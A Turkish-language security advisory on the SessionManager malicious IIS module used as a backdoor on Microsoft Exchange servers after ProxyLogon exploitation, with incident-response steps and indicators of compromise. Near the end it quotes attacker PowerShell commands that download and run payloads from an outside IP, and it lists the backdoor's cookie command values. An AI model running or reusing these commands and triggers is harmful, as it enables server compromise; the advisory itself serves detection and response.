SessionManager
Tanım
Dünya genelinde Microsoft Exchange sunucuları hedef alınarak SessionManager adlı zararlı arka kapıların yerleştirildiği ve saldırganların bu arka kapılar aracılığıyla iç ağda yayılabildikleri tespit edilmiştir.

SessionManager C++ dilinde geliştirilen zararlı içerikli bir IIS modülüdür. Session Manager’ın amacı IIS uygulamaları tarafından hedef sistemlere yüklenilmeyi sağlamaktır.

SALDIRI VEKTÖRÜ
SessionManager isimli zararlı yazılım, dünya genelinde çeşitli kuruluşlara ait Microsoft Exchange mail sunucularını ele geçirmek için "ProxyLogon" tipi güvenlik açıklıklarından yararlandıktan sonra sunucuda kalıcılık sağlamak için saldırganlar tarafından kullanılmaktadır. Kaspersky güvenlik araştırmacıları tarafından isimlendirildiği şekliyle SessionManager, bir zararlı IIS modülü olarak keşfedilmiştir. Daha önceden herhangi bir kullanıcının OWA (Outlook Web Access) ile oturum açtığı esnada kullanmış olduğu kullanıcı adı ve parola bilgisini ele geçiren bir IIS modülü olan Owowa’yı hatırlatan SessionManager zararlısının ayırt edici bir özelliği ise gizli olarak kalıcılık sağlayabiliyor olmasıdır. SessionManager’ın çoğunlukla kamu kurumları ve savunma sanayi alanında çalışan kuruluşları hedef aldığı bilinmektedir.

TESPİT VE ÖNLEMLER
Farklı SessionManager modüllerinin incelenmesi sonucunda aşağıdaki tespitler yapılmıştır:

1. En eski olan ve derlenme tarihi Mart 2021 olan ilk örneğinde “C:UsersGodLikeDesktoptt4StripHeadersmasterx64Rel easesessionmanagermodule.pdb” isimli PDB dosya yolunun bulunduğu görülmektedir.
2. Derlenme tarihi Nisan 2021 V1 örneğinde “C:UsersGodLikeDesktoptt4SessionManagerModulex64Re leasesessionmanagermodule.pdb” şeklinde bir PDB dosya yolu tespit edilmiştir.
3. Derlenme tarihi Ağustos 2021 olan V2 örneğinde V1 örneğindeki dosya yoluna rastlanmakla beraber “SessionManagerV2Module” isimli proje klasörüne rastlanmıştır.
4. Derlenme tarihi Eylül 2021 olan V3 örneğinde ise “SessionManagerV3Module” isimli proje klasörüne rastlanmıştır.

WEB Server HTTP iletişimine müdahale eden Session Manager, sunucunun istemciye gönderdiği http cevabını değiştirmektedir. Session Manager V2 versiyonu hariç olmak üzere istemciden gelen “SM_SESSIONID” ve V2’den sonra “SM_SESSION” cookie ismine bakmaktadır. Bu cookie isimlerine bağlı olarak SessionManager tarafından kod çalıştırılmaktadır. Zararlı yazılım aşağıdaki çerez değerleri ile sunucu üzerinde çeşitle komutlar çalıştırmaktadır:
• SM_SESSION=GETFILE
• SM_SESSION=PUTFILE
• SM_SESSION=DELETEFILE
• SM_SESSION=FILESIZE
• SM_SESSION=CMD
• SM_SESSION=PING
• SM_SESSION=S5CONNECT
• SM_SESSION=S5WRITE
• SM_SESSION=S5READ
• SM_SESSION=S5CLOSE

ProxyLogon tipindeki zafiyetlerin tespitine yönelik olarak sistemlerde kurulu IIS modüllerin listesini elde etmek için https://docs.microsoft.com/en-us/iis...he-iis-manager adresindeki yönergeler veya IIS appcmd komut satırı https://docs.microsoft.com/en-us/iis...e-command-line adresindeki gibi kullanılmalıdır.

Aşağıda yer alan zararlı yazılıma ait izlerden herhangi birinin fark edilmesi durumunda aşağıdaki adımlar uygulanmalıdır:
1. Siber olay müdahale çalışmaları başlatılmalı.
2. Zararlı yazılımdan etkilenen sistemler mevcut ağdan izole edilmeli.
3. Etkilenen sistemlerin ram ve disk imajları alınmalı.
4. Konuyla ilgili USOM’a ivedilikle bilgi verilmeli.
5. Kurum içerisindeki ilgili sistem ve ağ iz kayıtlarından enfekte olmuş sistemler üzerinden gerçekleşen hareketler incelenmeli ve olası yatayda yayılma eğilimleri tespit edilmelidir.
6. Enfekte olan ve yatayda ilerlemenin tespit edildiği tüm sistemlerde siber olay müdahale çalışması yapılması ve sıfırdan temiz kurulum gerçekleştirilmelidir.
7. Kurum içerisindeki tüm IIS ve Microsoft Exchange sunucuları son sürüme yükseltilmelidir.

İZLER
Zararlı Hash Bilgileri
 5FFC31841EB3B77F41F0ACE61BECD8FD - (stripheaders.dll)
 84B20E95D52F38BB4F6C998719660C35 - (stripheaders.dll)
 4EE3FB2ABA3B82171E6409E253BDDDB5 - (stripheaders.dll)
 2410D0D7C20597D9B65F237F9C4CE6C9
 95EBBF04CEFB39DB5A08DC288ADD2BBC
 F189D8EFA0A8E2BEE1AA1A6CA18F6C2B
 65DE95969ADBEDB589E8DAFE903C5381
 235804E3577EA3FE13CE1A7795AD5BF9
 30CDA3DFF9123AD3B3885B4EA9AC11A8
 5F15B17FA0E88D40D4E426E53CF94549

Files paths
 %PROGRAMFILES%MicrosoftExchange
ServerV15ClientAccessOWAAuthSessionManagerModule.d ll
 %PROGRAMFILES%MicrosoftExchange
ServerV15FrontEndHttpProxybinSessionManagerModule. dll
 %WINDIR%System32inetsrvSessionManagerModule.dll
 %WINDIR%System32inetsrvSessionManager.dll
 C:WindowsTempExchangeSetupExch.ps1
 C:WindowsTempExch.exe
 C:WindowsTempvmmsi.exe
 C:WindowsTempsafenet.exe
 C:WindowsTempupgrade.exe
 C:WindowsTempexupgrade.exe
 C:WindowsTempdvvm.exe
 C:WindowsTempvgauth.exe
 C:WindowsTempwin32.exe

PDB Dosya Yolları
 C:UsersGodLikeDesktoptt4StripHeadersmasterx64Rele asesessionmanagermodule.pdb
 C:UsersGodLikeDesktoptt4SessionManagerModulex64Rel easesessionmanagermodule.pdb
 C:UsersGodLikeDesktoptt4SessionManagerV2Modulex64R eleasesessionmanagermodule.pdb
 C:UsersGodLikeDesktoptt4SessionManagerV3Modulex64R eleasesessionmanagermodule.pdb
 C:UsersGodLikeDesktoptt0Hook-PasswordChangeNotifymasterHookPasswordChangex64Re leaseHookPasswordChange.pdb

Komutlar
 powershell "(New-Object
Net.WebClient).DownloadFile('hxxp://202.182.123[.]185/Dll2.dll','C:WindowsTempwin32.dll')"

 powershell "(New-Object
Net.WebClient).DownloadFile('hxxp://202.182.123[.]185/ssp.exe','C:WindowsTempwin32.exe')"
 C:WindowsTempwin32.exe C:WindowsTempwin32.dll

IP Adresleri
 202.182.123[.]185
 207.148.109[.]111